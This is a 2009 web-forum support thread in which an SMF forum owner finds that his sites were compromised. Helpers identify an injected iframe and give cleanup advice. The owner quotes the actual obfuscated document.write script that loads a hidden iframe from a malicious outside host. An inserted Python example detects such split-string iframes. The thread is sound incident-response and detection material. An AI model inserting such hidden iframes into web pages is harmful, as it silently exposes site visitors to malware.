What is this? Forum Disappeared

Started by alex30, July 05, 2009, 09:36:44 AM

alex30

Hello guys, I woke up this morning to check my forum and here is what appeared: some unusual error. What's interesting is that I didn't even do any work on the forum yesterday; it was all fine.

http://aquatropicalfish.com/forum/index.php

Please help me to fix it.


Kindred

looks like you installed a mod incorrectly.

We really can't help without some information like SMF version, the mod that you tried to install and probably access to your files.
Glory to Ukraine

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

alex30

Thanks for the reply, Kindred.

It was all fine after I installed a mod called Activity Bar. My version is 1.1.9. Any idea what I should do?

mashby

And also, the three sites that link to forums in your signature all have similar errors.
Always be a little kinder than necessary.
- James M. Barrie

alex30

Guys, is that some kind of hack? I'm on hostgator. Help me out please.

Kindred

Quote from: Kindred on July 05, 2009, 09:38:52 AM
looks like you installed a mod incorrectly.

no, it is probably not a hack... and to fix it, you will have to modify the file and clean up the bad code.

alex30

But two other sites have the same problem. One of them isn't SMF, but the error still appears in Aquarium User Bars.


babjusi

The Activity Bar mod doesn't affect the index.php file, which is the file that throws the error at your forum. Can you post here 10 lines above and below the error? Or attach the whole file here.

Kindred

in code tags, please post lines 550-610 of your index.php file

alex30

Thanks Kindred, it showed that on line 595 I had an error.

I removed that line, it looked like this

<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>

What's this?

vivid

I don't know
but if you upload your forum again it will be better.

without:
Settings.php
Settings_bak.php
style.css

consult smf specialists first about this step


Norv

Argh! You have been hacked.
An iframe was injected, a little obfuscated to look like that.
Please check out:
Gumblar's 48,000 Compromised Domains Makes the Web a Dangerous Place.
and Security recommendations.
To-do lists are for deferral. The more things you write down the later they're done... until you have 100s of lists of things you don't do.

File a security report | Developers' Blog | Bug Tracker


Also known as Norv on D* | Norv N. on G+ | Norv on Github

Norv

Please note that for all I know (check for "gumblar cn exploit" on the web also if you want), this has nothing to do with SMF. The entry point is rather related to vulnerabilities in browser/Flash/Adobe Reader software that allow those scripts to download and execute malware on each visitor's computer, including trojans and keyloggers that are reported to steal your FTP passwords, thus allowing access to more websites, which will be infected and thus spread the infection further.

Thus, scanning your computers with an up-to-date antivirus and changing all passwords from a secured machine are essential steps for it not to happen again.
Also, you should download all the sites and search for this code, as well as for "iframe" (except your iframes, sure.)

Kindred

Quote from: Kindred on July 05, 2009, 09:49:47 AM
in code tags, please post lines 550-610 of your index.php file

Why did you ignore the straightforward request?

yes, it appears that you were hacked.... I suspect that there are likely more lines.

babjusi

Also scan your PC with an antivirus program and change your FTP, forum and CP login info too, just to be safe.

I would also clean up all the forum files too if I were you.
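
Added example, not part of the original thread: a plain text search for "iframe" does not match the injected line quoted earlier, because the tag is split across concatenated string literals. This Python sketch joins the literals inside `document.write(...)` and reports any that spell out an iframe; the sample input is constructed (placeholder host `example.invalid`) and the function names are this example's own.

```python
import re
from pathlib import Path

# An inline <script>document.write(...)</script> block, as in the injected line.
SCRIPT_RE = re.compile(
    r"<script[^>]*>\s*document\.write\((.*?)\)\s*;?\s*</script>", re.I | re.S)
# One JS string literal, single- or double-quoted, allowing backslash escapes.
LITERAL_RE = re.compile(r"'((?:\\.|[^'\\])*)'" + r'|"((?:\\.|[^"\\])*)"', re.S)

# Constructed sample modelled on the thread's line; the host is a placeholder.
SAMPLE = r'''<?php
$x = 1;
?>
<script>document.write("<if"+''+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:"+"/"+'/exam'+"ple.inv"+'alid'+'/'+"\" wid"+'th=1 he'+"igh"+'t'+"=2></i"+"f"+"ra"+''+"me"+'>');</script>
'''

def collapse_concat(expr):
    """Join 'a'+"b"+... into one string; None if expr holds anything but literals."""
    if re.sub(r"[\s+]", "", LITERAL_RE.sub("", expr)):
        return None  # variables or calls present: not a pure literal chain
    parts = [a or b for a, b in LITERAL_RE.findall(expr)]
    return re.sub(r"\\(.)", r"\1", "".join(parts))  # drop JS backslash escapes

def find_hidden_iframes(text):
    """Return (line_number, decoded_markup) for each document.write that builds an iframe."""
    hits = []
    for m in SCRIPT_RE.finditer(text):
        decoded = collapse_concat(m.group(1))
        if decoded and "<iframe" in decoded.lower():
            hits.append((text.count("\n", 0, m.start()) + 1, decoded))
    return hits

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js", ".tpl")):
    """Scan a downloaded copy of a site; returns (path, line, decoded) tuples."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits += [(str(path), n, d) for n, d in find_hidden_iframes(text)]
    return hits

if __name__ == "__main__":
    for line, markup in find_hidden_iframes(SAMPLE):
        print(f"line {line}: {markup}")
```

Run `scan_tree()` against the downloaded copy of each site; every hit gives the file, the line to inspect and the markup the browser would have written.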

alex30

Damn guys, so it was a hack.  :-\

Kindred, I copied that code from 550 all the way down, there is no line 610

        'feedsadmin' => array('FeedPoster.php', 'FeedsMain'),
        'tags' => array('Tags.php', 'TagsMain'), 'staff' => array('Staff.php', 'Staff'),
        'feedsadmin' => array('FeedPoster.php', 'FeedsMain'),
        'welcome' => array('WelcomeTopic.php', 'WelcomeTopic'),
        'theme' => array('Themes.php', 'ThemesMain'),
        'topicredirect' => array('SplitTopics.php', 'TopicRedirects'),
        'trackip' => array('Profile.php', 'trackIP'),
        'admod' => array('Ads.php', 'Ads'),
        'about:mozilla' => array('Karma.php', 'BookOfUnknown'),
        'about:unknown' => array('Karma.php', 'BookOfUnknown'),
        'unread' => array('Recent.php', 'UnreadTopics'),
        'unreadreplies' => array('Recent.php', 'UnreadTopics'),
        'viewErrorLog' => array('ManageErrors.php', 'ViewErrorLog'),
        'viewmembers' => array('ManageMembers.php', 'ViewMembers'),
        'viewprofile' => array('Profile.php', 'ModifyProfile'),
        'verificationcode' => array('Register.php', 'VerificationCode'),
        'vote' => array('Poll.php', 'Vote'),
        'viewquery' => array('ViewQuery.php', 'ViewQuery'),
        'who' => array('Who.php', 'Who'),

        'login3' => array('login3.php', 'WelcomeBack'),
        'logout3' => array('logout3.php', 'GoodBye'),
        '.xml' => array('News.php', 'ShowXmlFeed'),
    );

    // Get the function and file to include - if it's not there, do the board index.
    if (!isset($_REQUEST['action']) || !isset($actionArray[$_REQUEST['action']]))
    {
        // Catch the action with the theme?
        if (!empty($settings['catch_action']))
        {
            require_once($sourcedir . '/Themes.php');
            return 'WrapAction';
        }

        // Fall through to the board index then...
        require_once($sourcedir . '/BoardIndex.php');
        return 'BoardIndex';
    }

    // Otherwise, it was set - so let's go to that action.
    require_once($sourcedir . '/' . $actionArray[$_REQUEST['action']][0]);
    return $actionArray[$_REQUEST['action']][1];
}

?><?php echo ''?>


Norv, thanks for the article. I probably caught that kind of virus but I'm still not sure what kind of hack that was. I keep 4 websites on my account and all 4 got infected, unbelievable!

Going to scan my PC again in order to see if Kaspersky 2009 will find anything suspicious. Thanks all for the advice.

Kindred

get rid of this as well
<?php echo ''; ?>
look at the dates of your other files as well... if the dates don't match your last actual modification, check the file for additional code like that

N3RVE

I'm going through old 'unresolved' topics, do you require any further support?
If there are none, please mark this topic as solved to indicate :)

-[n3rve]
Ralph "[n3rve]" Otowo
Former Marketing Co-ordinator, Simple Machines.
ralph [at] simplemachines [dot] org
"Somewhere, something incredible is waiting to be known." - Carl Sagan
